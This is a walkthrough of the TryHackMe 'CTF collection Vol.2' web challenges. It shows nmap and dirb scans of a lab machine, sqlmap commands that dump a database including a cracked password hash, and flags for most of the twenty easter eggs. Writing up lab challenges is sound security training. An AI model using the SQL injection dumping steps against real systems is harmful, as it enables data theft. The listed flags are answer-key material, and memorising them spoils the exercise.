TryHackMe | CTF collection Vol.2
Welcome, welcome and welcome to another CTF collection. This is the second installment of the CTF collection series. For your information, the second serious focuses on the web-based challenge. There are a total of 20 easter eggs a.k.a flags can be found within the box. Let see how good is your CTF skill.
Warning: The challenge contains seizure images and background. If you feeling uncomfortable, try removing the background on style tag.
Note: All the challenges flag are formatted as THM{flag}, unless stated otherwise
Submit all your easter egg right here. Gonna find it all!
Setup
➜ TryHackMe nmap -A -vv 10.10.101.183
22/tcp open ssh syn-ack OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 1b:c2:b6:2d:fb:32:cc:11:68:61:ab:31:5b:45:5c:f4 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAICZbLNIOa6Xx8zj7A1bZmQnqMwS+4k/eDqPTSxUAfkGU7k0UVOhHQDvcfBAmggbjC7zm0gHX5RQvn3gxbzsV/SeRAjp+DXhg4uLkTkFAwDssFn8lOQjEOk1XUHvFFwWXQCNqWxZ+rM7mIZIntYbjdQybCUp0pZgA3+spPXGdVWvAAAAFQDsrnpTlNjNb7iBzNAS6BuKnTqqnQAAAIBd9xpY8kXVLnAAQCKH4BhoUxgQNtyci+g//rI8jPuGQigyYBrqBlpCXwS+eDqtr1nXJBvJrUlqPpXPS+x0FtNcf/je24sallrIb5X5T44LIPHHO+u8yqRcKlbd3Ze8Tu6paXbVCI9sxh8Sf2Rj8oD1iVTbWCGBDl+Y0im9fkl1+QAAAIBiaJ1Ce3Xho/l3hVFLBQExyMx9sAjNC2cbZZCPvIvq6849baYcfb7bQE0IWtSaJSVLIBQAlZ+RYDxQWsdQQkyQl/0KOTojEt83/OteWa16veZhmG8EYIlJ1pxkKttBZbeePB61y0XmYsyOfXqbFztBkS4wKbgkZaPlZyg+q2Vb9g==
| 2048 8d:88:65:9d:31:ff:b4:62:f9:28:f2:7d:42:07:89:58 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCUAD22WKbNzRInAbbqdU8lcwDS6237CJZYlln/DGVYvlTBkcNCUCZ45vqb1Hnt+0hbdroxtfKrtScpHQVBMDmxhhc7QojK1WYMdaab1kcClcU0huEOIWgUFD18nlbij9TDk/v8B6H1IQ9UCpXdmmypxwu65g5EZm2H6+b4YLk28wZyU3Pt6DaSeO5JFc5ojg21f5g8RjGO1vJF4RiEHIs/Fq/ErAo3VmhoF/Wr5b1yTbZXgF4+1kXrt5EqsfmQrhm12Vnv4fjsIt4lxlLyypxx2LWDviEBcYiyD57HcLXo50CVvJaufpVGxGa5U/SrE2QeRdy8W/+jg519aNdQoyDT
| 256 40:2e:b0:ed:2a:5a:9d:83:6a:6e:59:31:db:09:4c:cb (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMRZRUQkFhSMJkWs8Gb6yKlWOCWtuKh73fLtH2az3J9+D6+OtBTEbZmfvyaQrog0KjJinQEOh4FQpf/WWiBIR0g=
80/tcp open http syn-ack Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/VlNCcElFSWdTQ0JKSUVZZ1dTQm5JR1VnYVNCQ0lGUWdTU0JFSUVrZ1p5QldJR2tnUWlCNklFa2dSaUJuSUdjZ1RTQjVJRUlnVHlCSklFY2dkeUJuSUZjZ1V5QkJJSG9nU1NCRklHOGdaeUJpSUVNZ1FpQnJJRWtnUlNCWklHY2dUeUJUSUVJZ2NDQkpJRVlnYXlCbklGY2dReUJDSUU4Z1NTQkhJSGNnUFElM0QlM0Q=
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: 360 No Scope!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

➜ TryHackMe dirb http://10.10.101.183
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jun 20 17:34:38 2020
URL_BASE: http://10.10.101.183/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.101.183/ ----
+ http://10.10.101.183/button (CODE:200|SIZE:39148)
+ http://10.10.101.183/cat (CODE:200|SIZE:62048)
+ http://10.10.101.183/cgi-bin/ (CODE:403|SIZE:289)
+ http://10.10.101.183/index (CODE:200|SIZE:94328)
+ http://10.10.101.183/index.php (CODE:200|SIZE:94328)
+ http://10.10.101.183/iphone (CODE:200|SIZE:19867)
==> DIRECTORY: http://10.10.101.183/login/
+ http://10.10.101.183/robots (CODE:200|SIZE:430)
+ http://10.10.101.183/robots.txt (CODE:200|SIZE:430)
+ http://10.10.101.183/server-status (CODE:403|SIZE:294)
+ http://10.10.101.183/small (CODE:200|SIZE:689)
+ http://10.10.101.183/static (CODE:200|SIZE:253890)
+ http://10.10.101.183/who (CODE:200|SIZE:3847428)
---- Entering directory: http://10.10.101.183/login/ ----
+ http://10.10.101.183/login/index (CODE:200|SIZE:782)
+ http://10.10.101.183/login/index.php (CODE:200|SIZE:782)
#1 Easter 1


THM{4u70b07_r0ll_0u7}
#2 Easter 2


Base64 decode all the result and you will get the final message, copy the message and copy it on the website


THM{f4ll3n_b453}
#3 Easter 3


THM{y0u_c4n'7_533_m3}
#4 Easter 4
➜ ~ sqlmap -r export.txt --dbs
# You can create an export with burpsuite

➜ ~ sqlmap -r export.txt --dump
# Now we dump all the tables

Table : user
+----------+------------------------------------------+
| username | password |
+----------+------------------------------------------+
| DesKel | 05f3672ba34409136aa71b8d00070d1b (cutie) |
| Skidy | He is a nice guy, say hello for me |
+----------+------------------------------------------+

Table: nothing_inside
[1 entry]
+-------------------------+
| Easter_4 |
+-------------------------+
| THM{1nj3c7_l1k3_4_b055} |
+-------------------------+
#5 Easter 5
Table : user
+----------+------------------------------------------+
| username | password |
+----------+------------------------------------------+
| DesKel | 05f3672ba34409136aa71b8d00070d1b (cutie) |
| Skidy | He is a nice guy, say hello for me |
+----------+------------------------------------------+

THM{wh47_d1d_17_c057_70_cr4ck_7h3_5ql}
#6 Easter 6

THM{l37'5_p4r7y_h4rd}
#7 Easter 7

As we can see there is the value “Invited” and the value is 0 let’s see if we can change that 🤤


THM{w3lc0m3!_4nd_w3lc0m3}
#8 Easter 8

Well, we need to change our user agent to see the hidden flag let’s do that 😞

THM{h3y_r1ch3r_wh3r3_15_my_k1dn3y}
#9 Easter 9


THM{60nn4_60_f457}
#10 Easter 10


Referrer : tryhackme.com
THM{50rry_dud3}
#11 Easter 11


THM{366y_b4k3y}
#12 Easter 12
Fake jquery plugin


Easter 12 is THM{h1dd3n_j5_f1l3}
#13 Easter 13

For some reason this page appears
THM{1_c4n'7_b3l13v3_17}
#14 Easter 14


THM{d1r3c7_3mb3d}
#15 Easter 15


Convert all the hex values to ASCII and type it in the input
Didn't find it :(
#16 Easter 16



THM{73mp3r_7h3_h7ml}
#17 Easter 17




Easter 17: THM{j5_j5_k3p_d3c0d3}
#18 Easter 18


Easter 18: THM{70ny_r0ll_7h3_366}
#19 Easter 19


THM{700_5m4l_3yy}
#20 Easter 20


Easter 20: THM{17_w45_m3_4ll_4l0n6}